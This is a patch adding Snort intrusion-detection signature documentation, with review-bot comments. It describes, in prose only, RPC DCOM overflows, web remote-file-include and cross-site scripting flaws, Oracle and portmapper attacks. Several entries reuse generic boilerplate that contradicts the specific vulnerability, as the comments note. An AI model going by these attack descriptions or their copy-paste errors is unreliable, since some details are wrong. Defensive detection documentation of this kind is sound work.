+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
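Review bot: this hunk duplicates the SID 3330 entry word for word, including the "Expoit" typo, the Attack Scenarios paragraph about "an overly long filename via a network share" that contradicts the malformed-RPC description in Detailed Information, and the empty Additional References; if 3330 and 3416 really cover the same vulnerability, say how the two rules differ (for example which port or transport each watches), otherwise the text needs to be specific to this SID.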
--- /dev/null
+++ b/doc/signatures/100000687.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+100000687
+
+--
+Summary:
+This event is generated when an empty CTCP NOTICE message is sent to an IRC 
+channel.
+
+--
+Impact:
+If the EnergyMech IRC Bot receives such a message, a denial of service 
+condition will occur.
+
+--
+Detailed Information:
+Whenever the EnergyMech IRC Bot processes a null CTCP NOTICE message, a denial 
+of service condition occurs. Note that this rule is set to examine only default 
+IRC ports, in order to conserve system resources; if you are particularly 
+concerned about this exploit, you may wish to set the ports to "any", as IRC 
+channels can exist on any port.
+
+--
+Affected Systems:
+EnergyMech <= 3.0.1
+
+--
+Attack Scenarios:
+An attacker could exploit this vulnerability via any IRC client, or by using an 
+automated script.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to version 3.0.2 or greater.
+
+--
+Contributors:
+VeriSign MSS Operations Team
+Joel Esler <joel.esler@sourcefire.com>
+
+--
+Additional References:
+http://www.energymech.net/versions-3.0.html
+
+--
--- /dev/null
+++ b/doc/signatures/2345.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+2345
+
+--
+Summary:
+This event is generated when an attempt is made to access the
+search.php script which contains known vulnerabilities and
+is part of  the phpGedView CGI web application running on a server.
+
+--
+Impact:
+Information gathering and possible cross site scripting attack.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the phpGedView CGI web application running on a server.
+Multiple vulnerabilities exist in the application which can lead to
+cross site scripting attacks.
+
+--
+Affected Systems:
+	phpGedView
+
+--
+Attack Scenarios:
+An attacker can supply code of their choice by including it in the
+firstname parameter of the search.php script.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
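Review bot: Affected Systems lists just "phpGedView" with no version, so "Ensure the system is using an up to date version" under Corrective Action gives the reader nothing to check against; add the affected and fixed versions, and fill Additional References, which is empty. Minor: double space in "part of  the phpGedView".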
--- /dev/null
+++ b/doc/signatures/2227.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2227
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP application Pod.Board.
+
+--
+Impact:
+Execution of arbitrary code on the client machine connecting to the host
+running the application. Theft of cookie data not limited to 
+authentication credentials is possible.
+
+--
+Detailed Information:
+The forum_details.php script does not properly check data supplied in 
+input fields or via URI parameters which leads to HTML injection 
+possibilites. This injection can include malicious script of the 
+attackers choosing.
+
+--
+Affected Systems:
+	planetinsanity.de pod.board 1.1
+
+--
+Attack Scenarios:
+A cross site scripting attack is possible, the attacker would need to 
+entice the victim to use a link supplied by the attacker which could 
+then divulge login and cookie information.
+
+--
+Ease of Attack:
+Moderate to Difficult. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
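Review bot: typo "possibilites" in Detailed Information, and "attackers choosing" should be "attacker's choosing". Additional References is empty although Affected Systems names a specific product and version (planetinsanity.de pod.board 1.1), so an advisory link should be available and would let readers confirm the "latest non-affected version" the Corrective Action asks for. Minor: trailing space on the "-- " separator before Additional References.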
--- /dev/null
+++ b/doc/signatures/1762.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1762
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
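Review bot: typo "ona web server" (missing space) in Detailed Information, and "attackers choosing" recurs. More importantly the file is generic CGI boilerplate (the same two paragraphs reappear verbatim for SID 2388 and SID 100000502 later in this patch) and does not name the CGI script SID 1762 matches; with Affected Systems at "All systems running CGI applications" and Additional References empty, the reader has no way to identify or patch the affected software.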
--- /dev/null
+++ b/doc/signatures/2388.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2388
+
+--
+Summary:
+This event is generated when an attempt is made to access
+view_broadcast.cgi on a server used for streaming media services.
+
+--
+Impact:
+Information gathering and system integrity compromise.
+
+--
+Detailed Information:
+The view_broadcast.cgi script contains a known vulnerability that may
+allow an attacker to perform a variety of cross-site scripting attacks.
+This event is generated when an attempt is amde to access the script
+directly from a source external to the protected network.
+
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
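Review bot: Detailed Information in 2388.txt contradicts itself: the first paragraph describes a cross-site scripting flaw in view_broadcast.cgi, but the next two paragraphs are the generic CGI text about credential validation ("Some applications do not perform stringent checks when validating the credentials of a client host"), which is not what XSS does. Keep the XSS paragraph and the input-validation sentence, drop the credential paragraph, and tone down Impact to match (XSS runs in the victim's browser; "system integrity compromise" overstates it). Also fix "amde" to "made" and "ona" to "on a", and since the text calls this a "known vulnerability", Additional References should carry the CVE or Bugtraq entry instead of being empty.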
--- /dev/null
+++ b/doc/signatures/100000502.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000502
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Ji-Takz" application running on a webserver. 
+Access to the file "tag.class.php" using a remote file being passed as the 
+"mycfg" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "mycfg" parameter in the "tag.class.php" script used by 
+the "Ji-Takz" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ji-Takz
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
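Review bot: The third Detailed Information paragraph in 100000502.txt ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials...") is about authentication and does not apply to a remote file include through "mycfg" in "tag.class.php"; drop it and fix "ona". The Attack Scenarios text about supplying credentials to an authentication mechanism is equally unrelated and should describe the RFI case: the attacker hosts a file and passes its URL as the "mycfg" value, and the web server executes it. Also "may indicate that an exploitation attempt has been attempted" is redundant ("may indicate an exploitation attempt"), and the Sid block is missing the blank line before "--" that the other entries use.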
--- /dev/null
+++ b/doc/signatures/100000493.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000493
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "DeluxeBB" application running on a webserver. 
+Access to the file "postreply.php" using a remote file being passed as the 
+"templatefolder" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "templatefolder" parameter in the "postreply.php" script 
+used by the "DeluxeBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using DeluxeBB
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
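Review bot: 100000493.txt reuses the credential-validation paragraph ("Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server") that has nothing to do with a remote file include via the "templatefolder" parameter of "postreply.php"; remove it, fix "ona" to "on a", and replace the Attack Scenarios text about an "authentication mechanism" with the actual scenario, an attacker-supplied URL in "templatefolder" whose content the server includes and runs. "Affected Systems: All systems running CGI applications using DeluxeBB" should simply read "Systems running DeluxeBB", and "has been attempted" after "exploitation attempt" is redundant.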
--- /dev/null
+++ b/doc/signatures/1674.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1674
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
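Review bot: 1674.txt carries text from a different rule: "This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit." under Detailed Information has nothing to do with an Oracle command, and "Attack Scenarios: Simple. These are Oracle database commands." answers Ease of Attack rather than describing a scenario. Drop the telnet sentence and write a real scenario (who issues the command, from where, with what access). The $ORACLE_PORTS advice is given twice, in Detailed Information and again in False Negatives; keep the fuller False Negatives version. The file also lacks the Affected Systems section every other entry has, and the Summary should say which command the rule matches rather than "a special command".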
--- /dev/null
+++ b/doc/signatures/1486.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1486
+ 
+--
+Summary:
+This event is generated when an attempt is made to access the file ctss.idc.
+
+--
+Impact:
+Remote access.  This attack may permit the execution of arbitrary
+commands on the vulnerable server.
+
+--
+Detailed Information:
+This mkilog.exe is a Common Gateway Interface (CGI) script that can be
+used to view and modify SQL database contents.  It posts data to another
+module, ctss,idc, that creates a table based on the parameters passed to
+it.  If an attacker passes parameters such as a valid username and
+password to create a table, it may be possible to alter the table to
+execute commands on the vulnerable server.
+
+--
+Affected Systems:
+	Windows systems.
+
+--
+Attack Scenarios:
+An attacker can attempt to exploit this vulnerability to execute remote
+commands on the vulnerable server. 
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Delete file /scripts/tools/ctss.idc
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+SecurityFocus Mail Archive:
+http://www.securityfocus.com/archive/101/200779
+
+--
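Review bot: Detailed Information in 1486.txt opens with "This mkilog.exe is a Common Gateway Interface (CGI) script" in an entry whose Summary is about ctss.idc, and then misspells the file as "ctss,idc" (comma for dot). Rewrite the opening so the relationship is clear ("mkilog.exe is a CGI script that ... posts data to another module, ctss.idc, which creates a table ..."), and since the attack flows through mkilog.exe, say whether "Delete file /scripts/tools/ctss.idc" under Corrective Action is sufficient on its own or whether mkilog.exe should be removed as well. The Summary should also state what the access attempt achieves, not only that the file was requested.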
--- /dev/null
+++ b/doc/signatures/3231.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3231
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
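Review bot: "Expoit code exists" under Ease of Attack should be "Exploit code exists". More importantly, Additional References is empty for a rule whose Summary claims a "known vulnerability in Microsoft RPC DCOM"; list the Microsoft bulletin and CVE for the specific DCOM issue SID 3231 covers, because there are several RPC DCOM flaws affecting the same Windows versions and the analyst needs to know which one is meant. The Attack Scenarios text ("a request for a file with an overly long filename via a network share") should also say that the request is carried over RPC, so it agrees with Detailed Information, which says the malformed data arrives "via RPC".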
--- /dev/null
+++ b/doc/signatures/1155.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1155
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
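Review bot: 1155.txt is generic boilerplate that never says what the rule actually matches: Summary, Detailed Information and Attack Scenarios would fit any web rule, and Additional References is empty. Documentation for a specific SID should name the URI, file or parameter the rule looks for and link the CVE or Bugtraq entry for that flaw; without that, an analyst cannot judge False Positives (listed here as "None known") or tell whether the affected software is present on the target at all.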
--- /dev/null
+++ b/doc/signatures/1873.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1873
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
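Review bot: The body of 1873.txt is word for word the same generic text as the 1155.txt entry above, so nothing here distinguishes the two rules. Summary should state which web application or path SID 1873 detects, Additional References should link the relevant advisory, and "Affected Systems: All systems using a web server" should be narrowed to the software concerned once it is named.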
--- /dev/null
+++ b/doc/signatures/446.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+446
+
+--
+Summary:
+This event is generated when an ICMP "SKIP" message is generated with a non-zero ICMP code.
+
+--
+Impact:
+Informational. This may indicate that the ICMP message has been crafted. 
+
+--
+Detailed Information:
+An ICMP "SKIP" message is issued when a SKIP request to provide keying material fails. The ICMP code value for this message should be 0.  If a non-zero code for the ICMP code is observed, it may be an indication that the packet was crafted with an invalid value.
+ 
+
+--
+Affected Systems:
+This traffic should have no adverse impact.
+
+--
+Attack Scenarios:
+An attacker may craft an ICMP "SKIP" message with an invalid ICMP code.  A single packet itself is not harmful, but the unusual ICMP code may indicate that this packet was abnormally generated.
+
+--
+Ease of Attack:
+Simple. There are many packages available to generate ICMP messages.
+
+--
+False Positives:
+Although it should be rare, it is possible to observe an ICMP "SKIP" message with an ICMP code greater than 0 if it is generated by software that does not conform to standards.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+None.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
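Review bot: "Affected Systems: This traffic should have no adverse impact." in 446.txt answers Impact, not Affected Systems; move that statement under Impact (which already says "Informational") and put the systems in scope, or "None", under Affected Systems. Detailed Information would also benefit from stating the ICMP type number that "SKIP" refers to, so the reader can match the description against a packet capture.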
--- /dev/null
+++ b/doc/signatures/2736.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2736
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_date
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
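Review bot: Detailed Information in 2736.txt breaks a sentence across lines: "vulnerability in the procedure alter_priority_date" is followed by ". This procedure is included in" on the next line, which looks like a templating glitch; join it as "vulnerability in the procedure alter_priority_date. This procedure is included in dbms_repcat." Also "Affected Systems: Oracle Oracle9i" doubles the vendor name, and Additional References should cite the Oracle alert for the dbms_repcat overflows, since Detailed Information calls this a "known vulnerability".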
--- /dev/null
+++ b/doc/signatures/2014.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+2014
+
+--
+Summary:
+Remote Procedure Call (RPC) is a facility that enables a machine to 
+request a service from another remote machine. This is done without the 
+need for detailed network information. Some versions of RPC have a 
+vulnerability that allows an a remote host to register (and un-register)
+applications from a spoofed source.
+
+--
+Impact:
+Possible denial of service (DoS) against the target host. Potential 
+remote root compromise of the target system.
+
+--
+Detailed Information:
+Certain versions of rpcbind portmapper contain a flaw that could allow 
+an attacker capable of spoofing TCP packets to set and unset calls to 
+arbitrary RPC programs.
+
+A denial of service could be instigated against the target machine that 
+could render network file system services and other such network 
+available services unavailable to network users.
+
+It is also possible for the attacker to gain super user access depending
+on the RPC service he is able to register. This could then lead to a
+compromise of all resources on the network the victim is attached to.
+
+--
+Affected Systems:
+All machines running vulnerable RPC services.
+
+--
+Attack Scenarios:
+The attacker could potentially spoof TCP packets for pmap_set to 
+register an RPC service. The attacker might also spoof TCP packets to 
+un-register needed services via pmap_unset.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+RPC services should not be available outside the local area network, 
+filter RPC ports at the firewall to ensure access is denied to RPC 
+enabled machines.
+
+RPC services should also be disabled where not needed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+BugTraq:
+http://www.securityfocus.com/bid/1892
+
+--
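Review bot: Summary in 2014.txt spends three sentences explaining what RPC is before reaching the event; every other entry opens with "This event is generated when ...", and this one should too (when a pmap_set or pmap_unset request reaches the portmapper from an external source), with the background moved to Detailed Information. Fix "allows an a remote host" to "allows a remote host". Detailed Information says the attacker must be "capable of spoofing TCP packets"; it would help to state whether the rule fires on any set/unset call or only on those from outside the protected network, since the sensor cannot tell a spoofed request from a genuine one.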
--- /dev/null
+++ b/doc/signatures/1431.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid: 1431
+
+--
+Summary:
+This event is generated when packets with the SYN flag set are sent to 
+multicast addresses.
+
+--
+Impact:
+Possible reconnaisance or evidence of a Denial of Service (DoS) attack.
+
+--
+Detailed Information:
+Under normal circumstances packets with the SYN flag set should not be 
+sent to multicast addresses.
+
+If the attacker has spoofed a multicast address when sending a SYN flood
+attack this traffic will be seen.
+
+an indicator of unauthorized network use, reconnaisance activity or 
+system compromise. These rules may also generate an event due to 
+improperly configured network devices.
+
+--
+Affected Systems:
+	Any
+
+--
+Attack Scenarios:
+The attacker may have intiated an attack and could have spoofed a 
+multicast address as the source.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Employ filtering at the firewall.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
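Review bot: Detailed Information in 1431.txt has an orphaned fragment: the paragraph beginning "an indicator of unauthorized network use, reconnaisance activity or system compromise." starts mid-sentence, and "These rules may also generate an event" is plural in a single-rule document; restore the missing first half or drop the paragraph. Summary says SYN packets are "sent to multicast addresses" (destination), while Attack Scenarios says the attacker "could have spoofed a multicast address as the source"; make source and destination consistent. Also "reconnaisance" (twice) should be "reconnaissance" and "intiated" should be "initiated".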
--- /dev/null
+++ b/doc/signatures/607.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 607
+
+--
+Summary: 
+This event is generated when an attempt to login using the "bin" account is made.
+
+--
+Impact: 
+An attacker may have gained the ability to initiate a remote interactive session on the server.
+
+--
+Detailed Information: 
+This event is generated when a connection using the "bin" account via  "rsh" is attempted. 
+
+This activity is indicative of attempts to abuse hosts using a default configuration. 
+
+Some UNIX systems used to ship with "bin" account enabled and no password required. Similarly, the "rshd" service was also enabled. This allowed an attacker to connect to the machine and establish an interactive session using the "bin" account.
+
+--
+Attack Scenarios: 
+An attacker finds a machine with default account "bin" and "rshd" service running and connects to it, then escalates his privileges to "root"
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+--
+False Positives: 
+None Known
+
+--
+False Negatives: 
+If a local username is not the same as the remote one ("bin"), the rule will not generate an event.
+
+--
+Corrective Action: 
+Investigate logs on the target host for further details and more signs of suspicious activity
+
+Use ssh for remote access instead of rlogin.
+
+--
+Contributors: 
+Original rule by Max Vision <vision@whitehats.com> modified from a signature written by Ron Gula
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
